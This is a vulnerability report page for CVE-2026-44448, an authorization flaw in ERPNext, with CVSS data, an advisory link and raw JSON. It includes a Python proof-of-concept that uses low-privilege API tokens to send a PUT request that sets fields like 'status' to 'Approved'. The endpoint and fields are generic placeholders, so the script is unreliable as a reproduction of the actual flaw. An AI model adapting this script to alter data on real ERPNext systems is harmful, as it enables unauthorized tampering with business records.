Security Vulnerability Report
CVE-2026-44448 CVSS 5.9 MEDIUM

Published: 2026-05-13 22:16:46
Last Modified: 2026-05-14 16:29:06

Description

ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, certain endpoints failed to enforce proper authorization checks, allowing users to modify data beyond their permitted role. This vulnerability is fixed in 15.102.0 and 16.11.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ERPNext < 15.102.0
ERPNext < 16.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target ERPNext instance URL (placeholder host)
TARGET_URL = "http://erpnext-target.com"
API_ENDPOINT = f"{TARGET_URL}/api/resource/SomeSensitiveData/doc_id_to_modify"

# Low-privilege user credentials (valid session required)
API_KEY = "low_priv_api_key"
API_SECRET = "low_priv_api_secret"

# Headers with authentication
headers = {
    "Authorization": f"token {API_KEY}:{API_SECRET}",
    "Content-Type": "application/json",
}

# Payload attempting to modify data beyond the user's role
payload = {
    "critical_field": "unauthorized_value",
    "status": "Approved",
}

try:
    # Send a PUT request to exercise the authorization bypass
    response = requests.put(API_ENDPOINT, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful! Data modified.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed or patched. Status code: {response.status_code}")
        print(f"[-] Response: {response.text}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

https://github.com/frappe/erpnext/security/advisories/GHSA-444j-g95x-5pqv

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44448", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:45.913", "lastModified": "2026-05-14T16:29:06.413", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, certain endpoints failed to enforce proper authorization checks, allowing users to modify data beyond their permitted role. This vulnerability is fixed in 15.102.0 and 16.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/frappe/erpnext/security/advisories/GHSA-444j-g95x-5pqv", "source": "[email protected]"}]}}